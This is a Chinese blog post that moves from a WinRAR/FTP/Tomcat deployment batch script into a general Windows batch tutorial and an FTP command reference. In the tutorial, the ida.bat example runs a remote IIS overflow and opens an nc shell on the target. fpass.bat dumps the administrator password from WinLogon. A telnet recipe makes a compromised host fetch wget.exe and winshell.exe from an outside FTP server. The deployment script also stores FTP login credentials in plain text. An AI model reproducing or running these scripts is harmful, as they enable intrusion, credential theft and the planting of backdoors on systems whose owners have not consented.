`
baoqf
  • 浏览: 109778 次
  • 来自: 杭州
社区版块
存档分类
最新评论

BAT+winrar命令行+ftp命令行 的运用

阅读更多

最近由于一个网站要频繁的改动,并且修改完后必须要马上部署到远程服务器上,前几次手动压缩,上传,解压,还能忍受,但是次数多了,就开始烦了。于是有了写个批处理文件的想法。

压缩上传文件zip.bat的内容如下:

rem 压缩网站文件目录,rar的命令行请参看rar帮助
"c:\Program Files\WinRAR\WinRAR.exe" a -as -r -EP1 "d:\chat.rar" "F:\eclipse\workspace\chat\context\*.*"
rem 删除rar文件中的jar文件,这样就不用上传这些大块头了
"c:\Program Files\WinRAR\WinRAR.exe" d "d:\chat.rar" "*.jar"
rem 上传
ftp -s:F:\vc\chatftp.txt 211.155.224.210

chatftp.txt文件内容如下:

test
test
bell
cd baoqf
put d:\chat.rar
bye
exit

远程登录到服务器上,运行解压批处理文件:

rem 解压,覆盖不提示
C:\WinRAR\WinRAR.exe x D:\data\baoqf\chat.rar D:\Tomcat\webapps\chat -r -y
rem 深度拷贝,覆盖不提示
xcopy D:\Tomcat\webapps\chat\context D:\Tomcat\webapps\chat /e /Y
xcopy D:\Tomcat\webapps\chat\abc.properties D:\Tomcat\webapps\chat\WEB-INF\classes\abc.properties /Y
rem 重启tomcat
d:\tomcat\bin\tomcat.exe stop
d:\tomcat\bin\tomcat.exe start

批处理BAT文件运用<!----><o:p></o:p>

<o:p></o:p>

1. 所有内置命令的帮助信息 
2. 
环境变量的概念 
3. 
内置的特殊符号(实际使用中间注意避开
4. 
简单批处理文件概念 
5. 
附件1 tmp.txt 
6. 
附件2 sample.bat 

###################################################################### 
1. 
所有内置命令的帮助信息 
###################################################################### 
ver 
cmd /? 
set /? 
rem /? 
if /? 
echo /? 
goto /? 
for /? 
shift /? 
call /? 
其他需要的常用命令 
type /? 
find /? 
findstr /? 
copy /? 
______________________________________________________________________ 
下面将所有上面的帮助输出到一个文件 
echo ver >tmp.txt 
ver >>tmp.txt 
echo cmd /? >>tmp.txt 
cmd /? >>tmp.txt 
echo rem /? >>tmp.txt 
rem /? >>tmp.txt 
echo if /? >>tmp.txt 
if /? >>tmp.txt 
echo goto /? >>tmp.txt 
goto /? >>tmp.txt 
echo for /? >>tmp.txt 
for /? >>tmp.txt 
echo shift /? >>tmp.txt 
shift /? >>tmp.txt 
echo call /? >>tmp.txt 
call /? >>tmp.txt 
echo type /? >>tmp.txt 
type /? >>tmp.txt 
echo find /? >>tmp.txt 
find /? >>tmp.txt 
echo findstr /? >>tmp.txt 
findstr /? >>tmp.txt 
echo copy /? >>tmp.txt 
copy /? >>tmp.txt 
type tmp.txt 
______________________________________________________ 

###################################################################### 
2. 
环境变量的概念 
###################################################################### 
_____________________________________________________________________________ 
C:\Program Files>set 
ALLUSERSPROFILE=C:\Documents and Settings\All Users 
CommonProgramFiles=C:\Program Files\Common Files 
COMPUTERNAME=FIRST 
ComSpec=C:\WINNT\system32\cmd.exe 
NUMBER_OF_PROCESSORS=1 
OS=Windows_NT 
Os2LibPath=C:\WINNT\system32\os2\dll; 
Path=C:\WINNT\system32;C:\WINNT;C:\WINNT\system32\WBEM 
PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH 
PROCESSOR_ARCHITECTURE=x86 
PROCESSOR_IDENTIFIER=x86 Family 6 Model 6 Stepping 5, GenuineIntel 
PROCESSOR_LEVEL=6 
PROCESSOR_REVISION=0605 
ProgramFiles=C:\Program Files 
PROMPT=$P$G 
SystemDrive=C: 
SystemRoot=C:\WINNT 
TEMP=C:\WINNT\TEMP 
TMP=C:\WINNT\TEMP 
USERPROFILE=C:\Documents and Settings\Default User 
windir=C:\WINNT 
_____________________________________________________________________________ 

path: 
表示可执行程序的搜索路径我的建议是你把你的程序copy  
%windir%\system32\. 
这个目录里面一般就可以自动搜索到
语法: copy mychenxu.exe %windir%\system32\. 
使用点(.) 便于一目了然 
对环境变量的引用使用(英文模式,半角)双引号 
%windir% 
变量 
%%windir%% 
二次变量引用
我们常用的还有 
%temp% 
临时文件目录 
%windir% 
系统目录 
%errorlevel% 
退出代码 

输出文件到临时文件目录里面.这样便于当前目录整洁

对有空格的参数你应该学会使用双引号("") 来表示比如对porgram file文件夹操作 
C:\>dir p* 
C:\ 
的目录 
2000-09-02 11:47 2,164 PDOS.DEF 
1999-01-03 00:47 <DIR> Program Files 
个文件 2,164 字节 
个目录 1,505,997,824 可用字节 

C:\>cd pro* 
C:\Program Files> 

C:\> 
C:\>cd "Program Files" 
C:\Program Files> 


###################################################################### 
3. 
内置的特殊符号(实际使用中间注意避开
###################################################################### 
微软里面内置了下列字符不能够在创建的文件名中间使用 
con nul aux \ / | || && ^ > < * 

You can use most characters as variable values, including white space. If you use the special characters <, >, |, &, or ^, you must precede them with the escape character (^) or quotation marks. If you use quotation marks, they are included as part of the value because everything following the equal sign is taken as the value. Consider the following examples: 
(
大意要么你使用^作为前导字符表示.或者就只有使用双引号""
To create the variable value new&name, type: 
set varname=new^&name 

To create the variable value "new&name", type: 
set varname="new&name" 

The ampersand (&), pipe (|), and parentheses ( ) are special characters that must be preceded by the escape character (^) or quotation marks when you pass them as arguments. 

find "
<!----><st1:place>Pacific Rim</st1:place>" < trade.txt > nwtrade.txt 
IF EXIST filename. (
<st1:state><st1:place>del</st1:place></st1:state> filename.) ELSE echo filename. missing 

创建一个文件 
>> 
追加到一个文件后面 
前缀字符.表示执行时本行在cmd里面不显示可以使用 echo off关闭显示 
对特殊符号( > < &)的前导字符第一个只是显示aaa 第二个输出文件bbb 
echo 123456 ^> aaa 
echo 1231231 > bbb 
() 
包含命令 
(echo aa & echo bb) 
和空格一样的缺省分隔符号
注释,表示后面为注释 
标号作用 
管道操作 
& Usage
:第一条命令 & 第二条命令 [& 第三条命令...] 
用这种方法可以同时执行多条命令,而不管命令是否执行成功 
dir c:\*.exe & dir d:\*.exe & dir e:\*.exe 
&& Usage
:第一条命令 && 第二条命令 [&& 第三条命令...] 
当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则一直执行完所有命令; 
|| Usage
:第一条命令 || 第二条命令 [|| 第三条命令...] 
当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的命令则一直执行完所有命令; 

常用语法格式 
IF [NOT] ERRORLEVEL number command para1 para2 
IF [NOT] string1==string2 command para1 para2 
IF [NOT] EXIST filename command para1 para2 

IF EXIST filename command para1 para2 
IF NOT EXIST filename command para1 para2 
IF "%1"=="" goto END 
IF "%1"=="net" goto NET 
IF NOT "%2"=="net" goto OTHER 
IF ERRORLEVEL 1 command para1 para2 
IF NOT ERRORLEVEL 1 command para1 para2 
FOR /L %%i IN (start,step,end) DO command [command-parameters] %%i 
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do echo %i %j %k 
按照字母顺序 ijklmnopq依次取参数
eol=c - 
指一个行注释字符的结尾(就一个
skip=n - 
指在文件开始时忽略的行数。 
delims=xxx - 
指分隔符集。这个替换了空格和跳格键的默认分隔符集。 


###################################################################### 
4. 
简单批处理文件概念 
###################################################################### 

echo This is test > a.txt 
type a.txt 
echo This is test 11111 >> a.txt 
type a.txt 
echo This is test 22222 > a.txt 
type a.txt 
第二个echo是追加 
第三个echo将清空a.txt 重新创建 a.txt 

netstat -n | find "3389" 
这个将要列出所有连接3389的用户的ip. 

________________test.bat___________________________________________________ 
@echo please care 
echo plese care 1111 
echo plese care 2222 
echo plese care 3333 
@echo please care 
@echo plese care 1111 
@echo plese care 2222 
@echo plese care 3333 
rem 
不显示注释语句,本行显示 
@rem 
不显示注释语句,本行不显示 
@if exist %windir%\system32\find.exe (echo Find find.exe !!!) else (echo ERROR: Not find find.exe) 
@if exist %windir%\system32\fina.exe (echo Find fina.exe !!!) else (echo ERROR: Not find fina.exe) 
___________________________________________________________________________ 

下面我们以具体的一个idahack程序就是ida远程溢出为例子.应该是很简单的

___________________ida.bat_________________________________________________ 
@rem ver 1.0 
@if NOT exist %windir%\system32\idahack.exe echo "ERROR: dont find idahack.exe" 
@if NOT exist %windir%\system32\nc.exe echo "ERROR: dont find nc.exe" 

@if "%1" =="" goto USAGE 
@if NOT "%2" =="" goto SP2 

tart 
@echo Now start ... 
@ping %1 
@echo chinese win2k:1 sp1:2 sp2:3 
idahack.exe %1 80 1 99 >%temp%\_tmp 
@echo "prog exit code [%errorlevel%] idahack.exe" 
@type %temp%\_tmp 
@find "good luck " %temp%\_tmp 
@echo "prog exit code [%errorlevel%] find [goog luck]" 
@if NOT errorlevel 1 nc.exe %1 99 
@goto END 

P2 
@idahack.exe %1 80 %2 99 %temp%\_tmp 
@type %temp%\_tmp 
@find "good luck " %temp%\_tmp 
@if NOT errorlevel 1 nc.exe %1 99 
@goto END 

:USAGE 
@echo Example: ida.bat IP 
@echo Example: ida.bat IP (2,3) 

:END 
_____________________ida.bat__END_________________________________ 

下面我们再来第二个文件.就是得到administrator的口令
大多数人说得不到.其实是自己的没有输入正确的信息

___________________________fpass.bat____________________________________________ 
@rem ver 1.0 
@if NOT exist %windir%\system32\findpass.exe echo "ERROR: dont find findpass.exe" 
@if NOT exist %windir%\system32\pulist.exe echo "ERROR: dont find pulist.exe" 

@echo start.... 
@echo ____________________________________ 
@if "%1"=="" goto USAGE 
@findpass.exe %1 %2 %3 >> %temp%\_findpass.txt 
@echo "prog exit code [%errorlevel%] findpass.exe" 

@type %temp%\_findpass.txt 
@echo ________________________________Here__pass
★★★★★★★★ 
@ipconfig /all >>%temp%\_findpass.txt 
@goto END 

:USAGE 
@pulist.exe >%temp%\_pass.txt 
@findstr.exe /i "WINLOGON explorer internat" %temp%\_pass.txt 
@echo "Ex
ample: fpass.bat %1 %2 %3 %4 !!!" 
@echo "Usage: findpass.exe DomainName UserName PID-of-WinLogon" 

:END 
@echo " fpass.bat %COMPUTERNAME% %USERNAME% administrator " 
@echo " fpass.bat end [%errorlevel%] !" 
_________________fpass.bat___END___________________________________________________________ 

还有一个就是已经通过telnet登陆了一个远程主机.怎样上传文件(win) 
依次在窗口输入下面的东西当然了也可以全部拷贝.Ctrl+V过去然后就等待吧!! 

echo open 210.64.x.4 3396>w 
echo read>>w 
echo read>>w 
echo cd winnt>>w 
echo binary>>w 
echo pwd >>w 
echo get wget.exe >>w 
echo get winshell.exe >>w 
echo get any.exe >>w 
echo quit >>w 
ftp -s:w 


ftp命令行参考

FTP命令是Internet用户使用最频繁的命令之一,不论是在DOS还是UNIX操作系统下使用FTP,都会遇到大量的FTP内部命令。熟悉并灵活应用FTP的内部命令,可以大大方便使用者,并收到事半功倍之效。  
FTP的命令行格式为:ftp-v-d-i-n-g[主机名],其中 
-v显示远程服务器的所有响应信息;
-i限制ftp的自动登录,即不使用;
-netrc文件;  
-d使用调试方式;
-g取消全局文件名。
ftp使用的内部命令如下(中括号表示可选项):
1.![cmd[args]]:在本地机中执行交互shell,exit回到ftp环境,如:!ls*.zip。
2.$macro-ame[args]:执行宏定义macro-name。
3.account[password]:提供登录远程系统成功后访问系统资源所需的补充口令。
4.appendlocal-file[remote-file]:将本地文件追加到远程系统主机,若未指定远程系统文件名,则使用本地文件名。
5.ascii:使用ascii类型传输方式。
6.bell:每个命令执行完毕后计算机响铃一次。
7.bin:使用二进制文件传输方式。
8.bye:退出ftp会话过程。  
9.case:在使用mget时,将远程主机文件名中的大写转为小写字母。
10.cdremote-dir:进入远程主机目录。  
11.cdup:进入远程主机目录的父目录。
12.chmodmodefile-name:将远程主机文件file-name的存取方式设置为mode,如:chmod777a.out。
13.close:中断与远程服务器的ftp会话(与open对应)。
14.cr:使用asscii方式传输文件时,将回车换行转换为回行。 
15.deleteremote-file:删除远程主机文件。
16.debug[debug-value]:设置调试方式,显示发送至远程主机的每条命令,如:debup3,若设为0,表示取消debug。
17.dir[remote-dir][local-file]:显示远程主机目录,并将结果存入本地文件local-file。 
18.disconnection:同close。
19.formformat:将文件传输方式设置为format,缺省为file方式。
20.getremote-file[local-file]:将远程主机的文件remote-file传至本地硬盘的local-file。
21.glob:设置mdelete,mget,mput的文件名扩展,缺省时不扩展文件名,同命令行的-g参数。
22.hash:每传输1024字节,显示一个hash符号(#)。
23.help[cmd]:显示ftp内部命令cmd的帮助信息,如:helpget。
24.idle[seconds]:将远程服务器的休眠计时器设为[seconds]秒。
25.image:设置二进制传输方式(同binary)。
26.lcd[dir]:将本地工作目录切换至dir。
27.ls[remote-dir][local-file]:显示远程目录remote-dir,并存入本地文件local-file。
28.macdefmacro-name:定义一个宏,遇到macdef下的空行时,宏定义结束。
29.mdelete[remote-file]:删除远程主机文件。
30.mdirremote-fileslocal-file:与dir类似,但可指定多个远程文件,如:mdir*.o.*.zipoutfile。
31.mgetremote-files:传输多个远程文件。
32.mkdirdir-name:在远程主机中建一目录。
33.mlsremote-filelocal-file:同nlist,但可指定多个文件名。
34.mode[modename]:将文件传输方式设置为modename,缺省为stream方式。
35.modtimefile-name:显示远程主机文件的最后修改时间。
36.mputlocal-file:将多个文件传输至远程主机。  
37.newerfile-name:如果远程机中file-name的修改时间比本地硬盘同名文件的时间更近,则重传该文件。
38.nlist[remote-dir][local-file]:显示远程主机目录的文件清单,并存入本地硬盘的local-file。
39.nmap[inpatternoutpattern]:设置文件名映射机制,使得文件传输时,文件中的某些字符相互转换,如:nmap$1.$2.$3[$1,$2].[$2,$3],则传

分享到:
评论

相关推荐

    ftp rar自动上传压缩批处理命令

    `ftp.exe`是Windows系统自带的FTP客户端,可以用来执行命令行FTP操作。要上传文件,我们需要连接到服务器,然后使用`put`命令发送文件。例如,上传“myfiles.rar”到FTP服务器的“uploads”目录: ``` ftp -s:ftp....

    BAT批处理脚本-定时备份文件并FTP上传至备份服务器(原版).zip

    4. **FTP上传**:脚本会利用`ftp.exe`命令行客户端或`ftpsend.bat`等第三方脚本来实现FTP上传。用户需要提供FTP服务器的IP地址、端口号、用户名和密码。脚本可能包含一系列`put`命令,用于将每个备份文件上传到...

    windows脚本SFTP上传文件至备份服务器方案

    - 如果需要,可以通过命令行手动触发定时任务来检查脚本是否正确执行。 - **查看备份结果**: - 登录备份服务器,检查备份文件是否成功上传。 #### 后记 - **优点**: - 本方案使用的工具均为常用工具,易于...

    使用批处理异地备份数据(winrar)

    2. 编写批处理脚本(例如命名为back.bat),这个脚本会定位到WinRAR的安装目录下,并使用WinRAR的命令行工具来执行压缩操作。 3. 脚本中应包含压缩命令(如:rar a -r -y C:\c.rar C:\c\*),该命令会压缩C盘下的c...

    rar自动压缩备份工具

    在这个自动备份工具中,我们可能需要编写一个批处理脚本(bak_soft.bat),这个脚本会调用WinRAR命令行版本(Rar.exe)进行文件的压缩操作。 首先,批处理脚本的核心内容可能包括指定需要备份的源文件或文件夹路径...

    批量下载气象NCEP数据

    在Windows环境下,可以创建一个批处理文件(.bat),在其中调用FTP命令行工具或者Python脚本来执行下载任务。批处理文件允许我们指定下载的URL、目标文件夹、文件列表等信息,实现一键启动批量下载。例如,批处理...

    JMETER-3.1+ant

    4. **JMeter与Ant集成**:可以在Ant的`build.xml`文件中配置目标,调用JMeter的命令行工具`jmeter.bat`或`jmeter.sh`来执行性能测试,收集并分析结果。 5. **持续集成**:Ant常与其他工具如Jenkins、Maven一起使用...

    2022.zip

    批处理文件(.Bat)是基于DOS和Windows操作系统的脚本文件,用于执行一系列命令行操作。这些命令可以是简单的系统命令,如复制、移动或删除文件,也可以是更复杂的任务,通过调用其他程序或脚本来实现。"z06" 可能是...

    DOS高手速成(学习dos的好教程)

    8. **网络与通信**:如果深入,可能会涉及DOS下的网络功能,如调制解调器的设置、文件传输协议(FTP)客户端的使用。 9. **故障排除**:教授如何诊断和解决DOS环境下的常见问题,如启动失败、文件丢失等。 10. **...

    2012计算机应用基础.pdf

    - 文件路径和命令提示符下的操作,如“cd”和“copy”命令,展现了基本的文件系统管理和命令行操作。 根据上述信息,虽然文档中存在一些OCR扫描误差,但仍可以提取出关于计算机应用基础知识的一系列技术点。这些...

    汇编dos工具win7 64 位机可用

    - **特点**:DOS操作系统以命令行界面为主,用户通过输入命令来执行操作,简洁高效。 - **在Windows 7 64位环境下的兼容性**:尽管Windows 7已经是现代图形化操作系统,但它内建了对DOS的兼容支持,用户可以在命令...

    网吧维护技术资料 合集

    3250 网吧维护\网吧内网、局域网IP建ftp服务器教程.txt 8806 网吧维护\网吧双线捆绑接入的实现方法.txt 6954 网吧维护\网吧操作系统优化Win98篇.txt 16619 网吧维护\网吧管理与维护方案 .txt 3243 网吧维护\网线的...

Global site tag (gtag.js) - Google Analytics